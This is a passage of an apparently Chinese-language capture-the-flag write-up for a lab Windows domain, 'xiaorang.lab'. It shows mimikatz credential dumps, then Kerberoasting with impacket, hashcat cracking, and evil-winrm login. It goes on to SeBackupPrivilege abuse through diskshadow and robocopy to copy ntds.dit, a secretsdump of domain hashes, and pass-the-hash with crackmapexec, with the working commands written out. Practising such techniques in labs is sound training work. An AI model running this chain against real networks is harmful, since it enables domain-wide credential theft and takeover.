         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:42
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:40
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:39
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :
        cloudap :

得到ntlm哈希

* Username : XR-0923$
* Domain   : XIAORANG
* NTLM     : dce5964aedcfef01a9bfab09f4389340
* SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b

向域控查询注册了SPN的用户

1	proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :dce5964aedcfef01a9bfab09f4389340 -dc-ip 172.22.14.11

获取此用户的ST

1	proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes :dce5964aedcfef01a9bfab09f4389340 -dc-ip 172.22.14.11 -request-user tianjing

hashcat爆破得到DPQSXSXgh2

继续使用evil-winrm登录

1	proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 2> /dev/null

现在有SeBackupPrivilege权限了。

谈谈域渗透中常见的可滥用权限及其应用场景（二）-腾讯云开发者社区-腾讯云

文章 - 利用卷影拷贝服务提取ntds.dit - 先知社区

创建文件raj.dsh

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

进行格式转换

1	unix2dos raj.dsh

先在c盘根目录创建一个文件夹

1	mkdir test

上传此文件

1	upload raj.dsh

卷影拷贝

1	diskshadow /s raj.dsh

生成ntds.dit和system用于接下来的获取哈希

1 2	robocopy /b z:\windows\ntds . ntds.dit reg save hklm\system system

下载文件（这一步可能有一点慢

1 2	download ntds.dit download system

获取哈希

1	impacket-secretsdump -ntds ntds.dit -system system local

PTH

1	proxychains crackmapexec smb 172.22.14.11 -u administrator -H70c39b547b7d8adec35ad7c09fb1d277 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

flag04: flag{43ed643b-3166-477b-b700-66a41b920b35}

参考文章：

【内网渗透】最保姆级的春秋云镜Privilege打靶笔记_云镜内网-CSDN博客

Privilege - 春秋云境 | h0ny’s blog

春秋云镜privilege-wp | P4tt0n’s b10g